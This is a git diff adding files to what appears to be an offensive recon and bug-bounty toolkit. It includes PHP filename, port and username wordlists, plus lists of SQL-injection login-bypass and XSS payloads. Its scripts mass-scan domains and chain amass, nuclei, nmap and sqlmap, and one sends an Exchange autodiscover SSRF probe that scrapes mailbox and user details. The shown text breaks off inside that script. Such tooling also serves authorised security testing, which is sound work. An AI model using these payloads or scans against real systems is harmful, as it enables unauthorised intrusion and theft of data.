+dbbak.php +dbaccess.class.php +db_tracking.php +db_stats.php +db_routines.inc.php +db_input.php +db_indexer.php +db_events.inc.php +db_ecard.php +db_details.php +db_config.php +db_access.php +day_schedules.php +dateparser.php +datafile_func.php +databackup.php +data_role_cache.php +data_ranks.php +data_modules_ucp.php +data_modules_mcp.php +data_modules_acp.php +data_icons.php +data_hooks.php +data_global.php +data_extensions.php +data_bots.php +data_acl_options.php +dataLib.class.php +dataBlocks.class.php +dashboardwidget.php +danish_mimes.php +danish.php +danish.lng.php +dZip.php +dUnzip.php +d.k1ng.php +cycle_image.php +custompage.php +customer_stats.php +customer_rec.php +customer_notes.php +customer_lookup.php +customer.php +custom_functions.php +custom.sef.php +cust_stat.php +cust_report06.php +cust_report05.php +cust_report04.php +cust_report03.php +cust_report02.php +cust_report01.php +cust_cancel.php +cust_add.php +cust_accept_add.php +cust_accept05.php +cust_accept04.php +cust_accept02.php +currencyVars.inc.php +csv.class.php +cssurl.class.php +cssclass.class.php +css_dropdownmenu.php +crop.php +cron.php.bak +criminel.php +creditwizard.inc.php +credit.notify.php +createroom.inc.php +createpdf.php +create_universe.php +create_customers.php +createWebSite3.php +createWebSite2.php +createWebSite.php +create.php +creacompte.php +cpanel.share.php +cp.trackback.php +cp.topic.php +cp.category.php +cp.article.php +coursesLinks.php +coursereport_log.php +courseSchedule.php +courseLinks.php +courseHomepage.php +courseGrades.php +coupons.php +coupon.php +country_manager.php +counter.inc.php +corsi.php +corpo_mod.php +corpo.php +corp.php +core_functions.php +copytemplate.php +copystylesheet.php +copyescape.php +coppermine.inc.php +cooliris3dwall.php +cookies.class.php +cookieprova.php +cookie_functions.php +cookie.auth.lib.php +convert_note.php +convert.php +control.tpl.php +context.php +contenttype.news.php +contentloader1.php +contentloader.php +contenthook.php +contentcache.php +content_space.php +content_css.php +contador2.php +contactus_old.php +contactus.php_files +contactpage.php +contactinfo.php +contact_org.php +contact_messages.php +contact_form.php +contact_detail.php +contactUs2.php +contactUs.php +contact.db.php +consulta.php +connexio.php +connect.inc.php +connCsUcy.php +confirmed.php +configure_old.php +configureOld.php +configuration.nx.php +config_path.php +config_edit_news.php +config_clicks.php +config_ads.php +config_add_news.php +config_Oct042010.php +config1.php +config.sef.php +config.php.bak +config.image.php +config.functions.php +config.buy.php +config.auth.lib.php +compose.php +compat.php50x.php +compat.php42x.php +compat.php41x.php +comparison_list.php +comparison.php +compare.php +company.php +commons.php +commenting.php +commenters.php +commentcategory.php +comment_function.php +combat.php +com_wrapper.php +com_rsgallery2.php +com_news_portal.php +com_login.php +com_k2.php +com_joomlaboard.php +com_forum.php +com_deeppockets.php +com_contact.php +com_banners.php +columns.php +columns.inc.php +column_display.php +colos_results.php +colos_form.php +colorchooser.php +collections_org.php +code.php +cobol.php +cmpi_popup.php +cma_m_won.php +cma_m_watching.php +cma_m_wanted.php +cma_m_storekit.php +cma_m_store.php +cma_m_sold.php +cma_m_selling.php +cma_m_scheduled.php +cma_m_prefs.php +cma_m_picman.php +cma_m_myaccount.php +cma_m_mailprefs.php +cma_m_history.php +cma_m_gas.php +cma_m_cma.php +cma_m_closed.php +cma_m_bulk.php +cma_m_bidding.php +cma_m_bankprefs.php +cma_m_aboutme.php +cma_invoicelook.php +cma_impann.php +cma_enditemearly.php +cma_drm.php +cma_cpcprefs.php +cma_classified.php +cma_blockbidder.php +cma_bankdetails.php +cma.php +close.php +clock_status.php +cloak.php +clickbank.php +cleanup.php +classads_lang.php +class.xmlschema.php +class.wsdlcache.php +class.wsdl.php +class.workflow.php +class.validation.php +class.user.php +class.user.inc.php +class.upload.php +class.ticket.php +class.template.php +class.tabs.php +class.support.php +class.status.php +class.stats.php +class.soap_val.php +class.soap_fault.php +class.setup.php +class.session.php +class.scm.php +class.routing.php +class.resolution.php +class.report.php +class.reminder.php +class.release.php +class.recipenav.php +class.prowl.php +class.project.php +class.priority.php +class.prefs.php +class.pdf.php +class.pager.php +class.note.php +class.newstopic.php +class.news.php +class.monitor.php +class.module.inc.php +class.menu.php +class.mail_queue.php +class.mail.php +class.lock.php +class.language.php +class.issue.php +class.ingredient.php +class.history.php +class.help.php +class.group.php +class.group.inc.php +class.global.inc.php +class.filter.php +class.faq.php +class.ezpdf.php +class.events.inc.php +class.dynamic.php +class.draft.php +class.db_api.php +class.date.php +class.customer.php +class.category.php +class.categorie.php +class.auth.php +class.attachment.php +cinfo.php +cil.php +chrome_new.php +chrome.php +choosing.php +choice.php +chmod.php +checktools.inc.php +checkout_finance.php +checknew.php +check_reminders.php +check_mines.php +check_login.php +check_link.php +check_fighters.php +check_back.php +chat.php +charts.php +chart.php +charsets.php +charsetmgr.php +changepass.php +changemail.php +changelog.k2.php +changegroupperm.php +changeWebsite.php +changeUser.php +changeTut.php +changeThumb.php +changeSeminar.php +changeProject.php +changePassword.php +changeLab.php +changeFields.php +changeDuty.php +changeCourseNote.php +changeCourseLink.php +changeCourseInfo.php +cforms_phpmailer.php +cforms.php +certi.php +centre.php +ccnewsletter.php +cc_ideb.php +cc_hsbc_result.php +cc_eselect_form.php +cc_epdq_result.php +cb.php +catsubcategories.php +catselector.php +catpwtext.php +catmgr.php +catlistings.php +categs.php +categoryform.inc.php +categorieslatest.php +categories_0222.php +categorie.php +cateddel.php +catalog_confirm.php +catadd.php +cat_lang_edit.php +cat_lang.php +catHandler.php +cat2groupperm.php +cashads.php +cart.php +captcha_qa.php +canon.php +cancer_hope.php +cancel.php +campaign.php +calligra.php +calendr.php +calendar.php3 +calenda1r.php +cachefix.php +cache_viewthread.php +cache_viewpro.php +cache_usergroups.php +cache_topicadmin.php +cache_smilies.php +cache_settings.php +cache_secqaa.php +cache_request.php +cache_register.php +cache_ranks.php +cache_post.php +cache_medals.php +cache_magics.php +cache_ipbanned.php +cache_index.php +cache_icons.php +cache_forums.php +cache_faqs.php +cache_censor.php +cache_birthdays.php +cache_bbcodes.php +cache_archiver.php +cacheLib.class.php +c55.php +c360_settings.php +c2.php +buynow.php +buttons.php +busi_report06.php +busi_report05.php +busi_report04.php +busi_report03.php +busi_report02.php +busi_report01.php +busi_accept06.php +busi_accept05.php +busi_accept04.php +busi_accept03.php +busi_accept02.php +busi_accept01.php +busca_arqs.php +bulkusers.php +buddy_manage.php +buadmin.php +bridgemgr.php +bridge.php +brazilian.lng.php +brand.php +bounty.php +bottomuserscols.php +bottom1.php +bots.php +bot.php +bookmark.lib.php +boo.php +boardEN.php +board.php.bak +bnt_ls_client.php +bnf.php +blogs.moderation.php +blogpage.php +blog_calendar.php +blogLib.class.php +blocks.class.php +blockinstance.php +blockform.php +blockemails.php +blockedusers.php +block_tag_flickr.php +block_search.php +block_rss_client.php +block_mnet_hosts.php +block_mentees.php +block_loancalc.php +block_html.php +blockLib.class.php +block.t.php +blacklist.php +binlog.lib.php +bindex.php +bigocaptcha.php +bid.php +bf.php +berkeleydb.lib.php +beanstream_usd.php +beanstream_cdn.php +bean_webobject.php +beacon.php +bdb.lib.php +basic4gl.php +basic.php +barcodes5.php +barcodes4.php +bar.transfer.php +bar.php +banning.php +banners_signup.php +banners.bak.php +bannedadd.php +banned.add.php +bankdetails.php +ban.php +ban.class.php +badword.class.php +badbehaviour.php +bad_password.php +backuplib.php +backuphw.php +backup_scheduled.php +backendt.php +backendjs.php +awardsEN.php +avisynth.php +avatars.php +avatar_manage.php +automail.php +autoloader.php +autoblogged.php +autobackup.php +auto_install.php +authenticate.php +auth_mnet.php +auser.php +auctionwatch.php +auctionoffers.php +auctionfriend.php +auctionapproval.php +auction.php +attack.php +attach.inc.php +asugstions.php +asubscribe.php +associate.php +assignment_sci.php +assignment_nrm.php +assignment_eco.php +assetmanager.php +askquestion.php +articles_popular.php +articles_latest.php +articleform.inc.php +arteddel.php +artadd.php +archives_actions.php +archiver.php +archive1.php +archive.js.php +archarsetc.class.php +arabic_mimes.php +apt_sources.php +appvars_actions.php +apply_tpl.php +apply_site.php +application.php3 +application.js.php +appearance.php +api.php5 +anything_slider.php +anycontent.php +antivirus.php +antibot_image.php +antibot.php +anonymous.php +announcement.php +announcegr.php +announce.inc.php +annmanagement.php +annedit.php +anews.php +analytics.php +amsimport.php +amodule.php +amember.php +am.trackback.php +am.topic.php +am.category.php +am.article.php +altres_contactes.php +alta.php +almohanad.php +allbidders.php +all_header.tpl.php +all_classes.php +allSeminars.php +alipay.api.php +aliasLib.class.php +algebra.php +alertpay_success.php +alertpay_adverts.php +alertpay.php +albmgr.php +akismet.php +ajobpost.php +ajaxupload.php +aioseop_options.php +aioseop.class.php +aidonate.php +aicontactsafe.php +aicontactsafe.js.php +agendaplace2.php3 +agendaplace.php3 +agenda2.php3 +agenda.php3 +agenda.php +agencia.php +affiliate_sales.php +affiliate_news.php +affiliate_clicks.php +affiliate.php +af_ZA.php +adwidgets.php +advmana.php +advisory.php +advisorsEN.php +advisors.php +advertiser.php +advertise.php +advcache.php +adv_search.php +adv_counter.php +adv.inc.php +adsadvanced.php +ads_user_request.php +ads_request.php +ads_edit.php +ads_add.php +adquestions_ed.php +adquestions.php +adodb_th.inc.php +adodb.functions.php +adodb.config.php +admission.php +adminupevents.php +adminmenu.php +adminmanagement.php +adminlog.php +adminlib.php +administrator.php +admingroups.inc.php +admingroup_3.php +admingroup_2.php +admingroup_16.php +admingroup_1.php +adminedit.php +admincp.php +admin_rooms.inc.php +admin_logo.php +admin_functions.php +admin_enc_zend.php +admin_enc_ion.php +admin_design.inc.php +admin_bulkkats.php +admin_bulkemails.php +admin_actions.php +admin.tpl.php +admin.sh404sef.php +admin.rsform.php +admin.live.tpl.php +admin.k2.php +admin.extplorer.php +addvoucher.php +adduserplugin.php +adduser.php +addtocart.php +addtemplateassoc.php +addtemplate.php +addsblockedit.php +addsblockcode.php +addpic.php +addnews.php +addnewfield.php +addlinkpartner.php +addhtmlblob.php +addgroup.php +addgallery.php +addfav.php +addcustompage.php +addcssassoc.php +addcss.php +addcontent.php +addbookmark.php +addbanner.php +add_to_footer.php +add_site.php +add_new_case.php +add_event.php +add_comment.php +addFields.php +add.php +adaptive.php +adapter.php +activitynames.php +activity.php +activecalendar.php +active1.php +active.php +activate.php +actionscript3.php +actionprod.php +action.validate.php +action.upload.php +action.transfer.php +action.topic.php +action.setprefs.php +action.rss.php +action.rate.php +action.printpage.php +action.print.php +action.newdir.php +action.module.php +action.importxml.php +action.filesform.php +action.fesubmit.php +action.exportxml.php +action.dosearch.php +action.detail.php +action.deletedir.php +action.changedir.php +action.category.php +action.browsecat.php +action.article.php +acpage.php +accounting.php +account_managers.php +account_details.php +account_check.js.php +acc_user.php +acc_owe.php +acc_inv_tmpl.php +acc.php +academicCalendar.php +abusereports.php +abusereport.php +abusedetails.php +abt_course_nrm.php +abt_course_eco.php +abt_course.php +abspath.php +aboutus.php +aboutpage.php +aboutme.preview.php +about_new.php +about_9c7g8zq36i.php +about_9c1hqzq36a.php +about.slovene.php3 +about.german.php3 +about.francais.php3 +about.english.php3 +abap.php +a_top_pannello.php +a_top_lingue.php +a_top.php +a_menu_pannello.php +a_menu_login.php +a_menu_generico.php +a_menu_dx_lingue.php +a_head.php +a_fine_pannello.php +a_fine_lingue.php +a_fine.php +_mailform.php +_default.php +_conf.php +_con_aaa_header.php +_con_aaa_form.php +_con_aaa_footer.php +_con_aaa_DS.php +ZipPoster.php +ZipArchive.php +Zdrowie.php +XHTMLStrict.php +Writer.php +Wiz9.php +Wiz8.php +Wiz7.php +Wiz6.php +Wiz5.php +Wiz4.php +Wiz3.php +Wiz2.php +Wiz13.php +Wiz12.php +Wiz11.php +Wiz10.php +Wiz1.php +ViewResume.php +V3.php +Uroda.php +Upload.php +UniqueAppender.php +UnderThesisProj.php +UnderSoftEnginEN.php +UnderSoftEngin.php +UnderLabEquipEN.php +UnderLabEquip.php +UnderFreeElectEN.php +UnderFreeElect.php +UnderCurriculum.php +UnderCourseAreas.php +UnderAdvElectEN.php +UnderAdvElect.php +Uncompress.php +True.php +Travelling.php +TinyMCE.module.php +Timer.php +TimeZone.php +ThumbLib.inc.php +ThumbBase.inc.php +ThreeWay.php +Thanikudithanam.php +TextField.class.php +TAMAUser.class.php +TAMATable.class.php +TAMARecord.class.php +Supplements.php +Subscribe.php +Stats.php +StartProfiler.php +Span.php +Spams.php +SmartImage.class.php +SmartIRC.php +Sigma.php +Session.php +Separator.inc.php +Select.php +Search.module.php +SLLists.class.php +SASL.php +Result_SemII.php +Result_SemI.php +Request.php +Reposter.php +Relay.php +Relationships.php +Reklama.php +Ralationship.php +ProtectorFilter.php +Products.php +Printing.module.php +Prenumerata.php +Predicate.php +Plain.php +PhpThumb.inc.php +Partnerzy.php +Partners.php +Partition.class.php +POP3.php +PMA_List.class.php +Order.php +Or.php +Not.php +News.module.php +NestedTree.php +Namespace.php +Moda.php +ModCatTree.php +MinTime.php +MinSize.php +MimeList.php +Milestones.php +MethodTable.php +Message.class.php +MemoryArchive.php +MaxDepth.php +MasterGoalsEN.php +MasterGoals.php +Market.php +Mapped.php +MainWiz.dwt.php +Main.dwt.php +MIME.php +Login.php +LogIn.php +Log.php +LocalSettings.php +List.class.php +LinkField.class.php +Link.inc.php +Lifestyle.php +Kontakty.php +Kariera.php +Jewelry.php +JavaScript.php +JINCSubscription.php +Index.class.php +Human.php +HtAccess.php +Health.php +HMACSHA1.php +GoogleSearch.php +Getopt.php +GdThumb.inc.php +FreeSansBold.php +FreeSans.php +Form.php +Form.class.php +FirePHP.class.php +FinalCreatPage.php +Filesystem.php +File.class.php +Fields.php +FieldProfiles.php +FieldBase.class.php +Fashion.php +False.php +FacultyMainMenu.php +FacPersonalPage.php +Exceptions.lib.php +Error.php +Eregi.php +Ereg.php +EnchantSpell.php +EmployerView.php +Duplicate.php +Download.php +Directory.php +DirectiveAlias.php +DigestMD5.php +Diff3.php +Detect.php +Date.php +DataControl.php +Data.php +DWLSTransients.php +DIME.php +DBG.php +Current.php +CramMD5.php +Content.inc.php +Contacts.php +ContactLib.class.php +ConfigDef.php +Concat.php +ChangeName.php +CatTree.php +Career.php +Calc.php +CYEC07_3winners.php +CYEC07_2winners.php +CYEC07_1winners.php +CSRF.php +CMSMailer.module.php +Bio.php +Bindex.php +Beauty.php +Auth.php +Artwork.php +AppVars.php +Anonymous.php +And.php +Amemberlist.php +Aindex.php +Adverts.php +Advertising.php +AddBaseName.php +Accueil.php +AccessLib.class.php +ADOdb.php +91hero.php +9.php +9.0.php +8.php +8.5.php +8.3.php +8.2.php +8.0.php +7.php +7.2.php +7.0.php +6.php +6.7.php +6.5.php +6.3.php +6.2.php +6.0.php +5.php +404SEF_cpanel.php +3x.php +3dsecure.php +2lines.php +2colsinline.php +2cols2lines.php +28.php +27.php +26.php +25.php +24.php +23.php +22.php +21.php +201106_errorlog.php +201105_modslog.php +201105_modcp.php +201105_errorlog.php +201105_cplog.php +20.php +1_whosonline.tpl.php +1_viewthread.tpl.php +1_tag.tpl.php +1_stats_team.tpl.php +1_stats_misc.tpl.php +1_stats_main.tpl.php +1_seccheck.tpl.php +1_search.tpl.php +1_register.tpl.php +1_memberlist.tpl.php +1_login.tpl.php +1_leftmenu.tpl.php +1_header.tpl.php +1_footer.tpl.php +1_faq.tpl.php +1_discuzcode.tpl.php +1_discuz.tpl.php +1_credits.tpl.php +19.php +18.php +17.php +16.php +13.php +12.php +11.php +10.php +.sys.php +.Blog.ini.php \ No newline at end of file diff --git a/lists/ports.txt b/lists/ports.txt new file mode 100644 index 0000000..bcab016 --- /dev/null +++ b/lists/ports.txt @@ -0,0 +1,54 @@ +21 +22 +80 +82 +443 +444 +452 +2375 +2376 +3306 +4243 +4443 +5672 +5673 +5984 +6379 +8000 +8001 +8181 +8080 +8085 +8099 +8443 +9090 +9092 +9200 +9300 +9443 +10000 +10080 +18080 +18443 +10249 +10250 +10251 +10255 +15672 +15673 +19999 +20080 +28017 +28080 +28443 +30080 +38080 +38443 +40080 +48080 +48443 +50080 +58080 +58443 +60080 +50000 \ No newline at end of file diff --git a/lists/small-fuzzing.txt b/lists/small-fuzzing.txt new file mode 100644 index 0000000..2865885 --- /dev/null +++ b/lists/small-fuzzing.txt @@ -0,0 +1,19 @@ +or 1=1 +or 1=1-- +'-' +' ' +'&' +'^' +'*' +' or ''-' +admin' -- +admin' # +"'> +“”;<“ +"';<" +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +'';!--"=&{()} + + +%22%27%3E%3C%68%31%3E%78%73%73%3C%2F%68%31%3E +"'><h1>xss</h1> \ No newline at end of file diff --git a/lists/sql-bypass.txt b/lists/sql-bypass.txt new file mode 100644 index 0000000..bfd885d --- /dev/null +++ b/lists/sql-bypass.txt @@ -0,0 +1,47 @@ +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +') or '1'='1-- +' or 1=1/* diff --git a/lists/true.txt b/lists/true.txt new file mode 100644 index 0000000..1a2465f --- /dev/null +++ b/lists/true.txt @@ -0,0 +1,5 @@ +1 +on +true +active +activated diff --git a/lists/usernames.txt b/lists/usernames.txt new file mode 100644 index 0000000..04b96d2 --- /dev/null +++ b/lists/usernames.txt @@ -0,0 +1,20 @@ +root +adm +admin +Admin +administrator +test +testing +guest +info +user +dev +developement +developer +qa +mysql +oracle +tomcat +ftp +stage +staging \ No newline at end of file diff --git a/scripts/active-checker.py b/scripts/active-checker.py new file mode 100644 index 0000000..f180503 --- /dev/null +++ b/scripts/active-checker.py @@ -0,0 +1,115 @@ +import requests +requests.packages.urllib3.disable_warnings() +from concurrent.futures import ThreadPoolExecutor +import colorama + +colorama.init(autoreset=True) +import os +from bs4 import BeautifulSoup +import argparse + +folder = os.path.dirname(__file__) +visited_pages = [] +output_strings = [] + + +def main(): + with open(input_file, "r") as myfile: + content = myfile.readlines() + + with ThreadPoolExecutor(max_workers=100) as executor: + for line in content: + executor.submit(start_crawler, "http://" + line.strip() + "/") + executor.submit(start_crawler, "http://" + line.strip() + ":8080/") + executor.submit(start_crawler, "http://" + line.strip() + ":8081/") + executor.submit(start_crawler, "https://" + line.strip() + "/") + executor.submit(start_crawler, "https://" + line.strip() + ":4434/") + executor.submit(start_crawler, "https://" + line.strip() + ":8443/") + +def start_crawler(url): + try: + site_result = request_url(url) + if site_result is not False: + get_banner(site_result[0], site_result[1]) + except Exception as e: + print(e) + + +def request_url(url): + try: + if url not in visited_pages: + session = requests.session() + session.headers[ + "User-Agent" + ] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36" + header = session.head(url=url, timeout=3, verify=False) + + # ignore 404 and error pages + if header.status_code >= 400: + return False + + # check content type + one_allowed_content_type = False + for allowed_content_type in ["html", "plain", "xml", "text", "json"]: + if ( + not header.headers.get("content-type") + or allowed_content_type + in header.headers.get("content-type").lower() + ): + one_allowed_content_type = True + if not one_allowed_content_type: + return False + + response = session.get(url=url, timeout=2, verify=False) + session.close() + + soup = BeautifulSoup(response.text, "html.parser") + visited_pages.append(url) + return (response, soup) + else: + return False + except Exception as e: + return False + + +def get_banner(request, soup): + banner_array = [] + banner_array.append(request.url) + banner_array.append(request.headers.get("Server")) + try: + if soup.find("title"): + title = soup.find("title").get_text().strip().replace("\n", "") + else: + title = "" + banner_array.append(title) + meta_tags = soup.find_all("meta", attrs={"name": "generator"}) + if len(meta_tags) > 0: + for meta_tag in meta_tags: + banner_array.append(meta_tag.attrs.get("content")) + except Exception as e: + print(e) + + fullstring = ", ".join(str(item) for item in banner_array) + if fullstring not in output_strings: + output_strings.append(fullstring) + print(colorama.Fore.GREEN + fullstring) + with open(output_file + "_banner.txt", "a") as output_1: + output_1.write(fullstring + "\n") + with open(output_file, "a") as output_2: + output_2.write(request.url + "\n") + + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Check if domain has an active website and grab banner." + ) + parser.add_argument( + "-i", type=str, default="./input.txt", help="Path to input file" + ) + parser.add_argument( + "-o", type=str, default="./output.txt", help="Path to output file" + ) + args = parser.parse_args() + input_file = args.i + output_file = args.o + main() diff --git a/scripts/add-orginfo.py b/scripts/add-orginfo.py new file mode 100644 index 0000000..3867edf --- /dev/null +++ b/scripts/add-orginfo.py @@ -0,0 +1,49 @@ +import os +import subprocess +import argparse +import re + + +def main(input_file, output_file): + if os.path.exists(input_file): + with open(input_file, "r") as myfile: + content = myfile.readlines() + for line in content: + output_string = [] + try: + if re.search("\[CVE.*?\]", line): + cve = re.search("\[CVE.*?\]", line).group() + output_string.append(cve) + except: + pass + + http = re.search("( )?http.*?//.*?(/|,)", line).group().strip().replace(",", "") + output_string.append(http) + + domain = re.search("//.*?(/|,)", line).group().replace(",", "").replace("//", "").replace("/", "") + + host_result = subprocess.run(["host", domain], capture_output=True) + first_ip = re.search("address .*?\\\\n", str(host_result.stdout)).group().replace("address ", "").replace("\\n", "") + output_string.append(first_ip) + + whois_result = subprocess.run(["whois", first_ip], capture_output=True) + + try: + output_string.append(re.search("netname:.*?\\\\n", str(whois_result.stdout)).group().replace("netname:", "").replace("\\n", "").strip()) + except: + print("No netname found for domain...") + try: + output_string.append(re.search("org:.*?\\\\n", str(whois_result.stdout)).group().replace("org:", "").replace("\\n", "").strip()) + except: + print("No org found for domain...") + + with open(output_file, "a") as my_file: + print(", ".join(output_string)) + my_file.write(", ".join(output_string) + "\n") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Add host infos to vulns.") + parser.add_argument("-i", type=str, default="input.txt", help="Input normal url results from nuclei.") + parser.add_argument("-o", type=str, default="orgs.txt", help="Output CVE with host and org infos.") + args = parser.parse_args() + main(args.i, args.o) \ No newline at end of file diff --git a/scripts/archiv-full-check.py b/scripts/archiv-full-check.py new file mode 100644 index 0000000..e15e26f --- /dev/null +++ b/scripts/archiv-full-check.py @@ -0,0 +1,204 @@ +import os +import argparse + + +def main(input_file, folder, batch): + if input_file != "no": + # use input file + with open(input_file, "r") as myfile: + content = myfile.readlines() + for line in content: + start_wizard(line.strip(), folder, batch) + else: + # ask for target domain + print("Target domain:") + domain = input() + start_wizard(domain, folder, batch) + + +def start_wizard(domain, folder, batch): + domain = domain.strip() + folder = folder.strip() + print("Start with: " + domain) + domain_parts = domain.split("/") + if len(domain_parts) >= 2: + domain = domain_parts[2].replace("www.", "") + + if os.path.exists(folder + "/" + domain + "_subs") == False: + os.system( + "amass enum -active -brute -w lists/dns.txt -d '" + + domain + + "' -dir '" + + folder + + domain + + "_subs' -noalts -max-dns-queries 1500 -rf config/resolver.txt -nolocaldb" + ) + + os.system( + "python3 scripts/active-checker.py -i '" + + folder + + domain + + "_subs/amass.txt' -o " + + folder + + domain + + "_subs/active.txt" + ) + + os.system( + "nuclei -tags cve -rl 100 -i '" + + folder + + domain + + "_subs/active.txt' -o '" + + folder + + domain + + "_subs/cve.txt'" + ) + + if batch == "no": + print("Take screenshots? yes/no") + screenshot_check = input() + if screenshot_check.lower() == "yes" or screenshot_check.lower() == "y": + os.system( + "python3 scripts/take-screenshots.py -i '" + + folder + + domain + + "_subs/active.txt' -o " + + folder + + domain + + "_subs/screenshot_log.txt -folder " + + folder + + domain + + "_subs/" + ) + + if batch == "no": + print("NMAP port scan? yes/no") + nmap_scan = input() + if nmap_scan.lower() == "yes" or nmap_scan.lower() == "y": + os.system( + "nmap --top-ports 50 -sV -T5 --open -A --script vulners --script-args mincvss=8 --stats-every 30s -iL '" + + folder + + domain + + "_subs/amass.txt' -oN '" + + folder + + domain + + "_subs/nmap.txt'" + ) + else: + print( + "Folder in " + + folder + + " already exist, skip subdomain recon for " + + domain + + "." + ) + + if batch == "no": + print("Check org information for more domains? yes/no") + domain_check = input() + if domain_check.lower() == "yes" or domain_check.lower() == "y": + os.system("amass intel -d " + domain + " -whois -dir " + folder + domain) + print("Check all new org domains? yes/no") + full_domain_check = input() + if full_domain_check.lower() == "yes" or full_domain_check.lower() == "y": + os.system( + "amass enum -active -brute -w lists/dns.txt -df '" + + folder + + domain + + "/amass.txt' -dir '" + + folder + + domain + + "_subs' -noalts -max-dns-queries 1500 -rf config/resolver.txt -nolocaldb" + ) + os.system( + "python3 scripts/active-checker.py -i '" + + folder + + domain + + "_subs/amass.txt' -o '" + + folder + + domain + + "_subs/active.txt'" + ) + if batch == "no": + os.system( + "python3 scripts/take-screenshots.py -i '" + + folder + + domain + + "_subs/active.txt' -o " + + folder + + domain + + "_subs/screenshot_log.txt -folder " + + folder + + domain + + "_subs/" + ) + + if batch == "no": + print("Crawl websites that we have found? yes/no") + crawl_check = input() + if crawl_check.lower() == "yes" or crawl_check.lower() == "y": + os.system( + "python3 scripts/crawler.py -i '" + + folder + + domain + + "_subs/active.txt' -o '" + + folder + + domain + + "_subs/crawled.txt'" + ) + + print("Check results with SQLmap? yes/no") + sql_check = input() + if sql_check.lower() == "yes" or sql_check.lower() == "y": + with open(folder + "/" + domain + "_subs/active.txt", "r") as myfile: + content = myfile.readlines() + for line in content: + if ( + "?" in line.strip() + or "=" in line.strip() + or "id" in line.strip() + ): + os.system( + "sqlmap -u '" + + line.strip() + + "' -b --batch --banner --threads 5 --random-agent" + ) + + if batch == "no": + print("Check for leaks? yes/no") + leak_check = input() + if leak_check.lower() == "yes" or leak_check.lower() == "y": + os.system( + "python3 scripts/leak-checker.py -i '" + + folder + + domain + + "_subs/amass.txt' -o '" + + folder + + domain + + "_subs/leaks.txt' -leaky lists/leaky-urls.txt" + ) + if crawl_check.lower() == "yes" or crawl_check.lower() == "y": + os.system( + "python3 scripts/leak-checker.py -i '" + + folder + + domain + + "_subs/crawled.txt' -o '" + + folder + + domain + + "_subs/leaks.txt' -leaky lists/leaky-urls.txt" + ) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Crawl websites from subdomain/domain list" + ) + parser.add_argument("-i", type=str, default="no", help="Path to input file") + parser.add_argument( + "-folder", type=str, default="scans/", help="Subfolder to save results." + ) + parser.add_argument( + "-batch", type=str, default="no", help="Dont ask for inline questions." + ) + args = parser.parse_args() + main(args.i, args.folder, args.batch) diff --git a/scripts/bblist.py b/scripts/bblist.py new file mode 100644 index 0000000..79049f6 --- /dev/null +++ b/scripts/bblist.py @@ -0,0 +1,26 @@ +import json +import argparse + +def main(input_file, output_file): + with open(input_file, "r") as myfile: + content = myfile.read() + json_obj = json.loads(content) + + results = [] + counter = 0 + for program in json_obj["programs"]: + for domains in program["domains"]: + counter = counter + 1 + results.append(domains) + + result_string = "\n".join(results) + print(f"BB Programs: {str(len(json_obj['programs']))}, domains: {str(counter)}") + with open(output_file, "w") as out: + out.write(result_string) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Flatting a the JSON-list to TXT.") + parser.add_argument("-i", type=str, default="no", help="Path to input file") + parser.add_argument("-o", type=str, default="bblist.txt", help="Output of BB list.") + args = parser.parse_args() + main(args.i, args.o) \ No newline at end of file diff --git a/scripts/check-exchange.py b/scripts/check-exchange.py new file mode 100644 index 0000000..217eece --- /dev/null +++ b/scripts/check-exchange.py @@ -0,0 +1,85 @@ +from concurrent.futures import ThreadPoolExecutor +import argparse +import requests +import re +from datetime import datetime + +requests.packages.urllib3.disable_warnings() +import colorama + +colorama.init(autoreset=True) + + +def main(): + http = "https://" + with open(input_file, "r") as myfile: + content = myfile.readlines() + + with ThreadPoolExecutor(max_workers=5) as executor: + for url in content: + if url.startswith("http"): + http = "" + # only use url and not banner + if "," in url: + url_array = url.split(",") + url = url_array[0] + executor.submit(start_poc, http + url.strip()) + +def start_poc(input_url): + try: + session = requests.session() + session.headers[ + "User-Agent" + ] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 POCTEST" + # only keep domain + url_array = input_url.split("/") + url = "/".join(url_array[0:3]) + response = session.get( + url=url + + "/autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@foo.com", + timeout=5, + verify=False, + ) + session.close() + + if response.status_code == 200: + if "NT AUTHORITY\\SYSTEM" in response.text or "Connectivity Endpoint" in response.text: + print(colorama.Fore.RED + url + " is vulnerable!") + mailbox = "" + created = "" + user = "" + version = "" + try: + mailbox = re.search("Mailbox:.*?

", response.text).group().replace("", "").replace("

", "") + created = re.search("Created:.*?

", response.text).group().replace("", "").replace("

", "") + user = re.search("User:.*?
", response.text).group().replace("", "").replace("
", "") + version = re.search("Version:.*?
", response.text).group().replace("
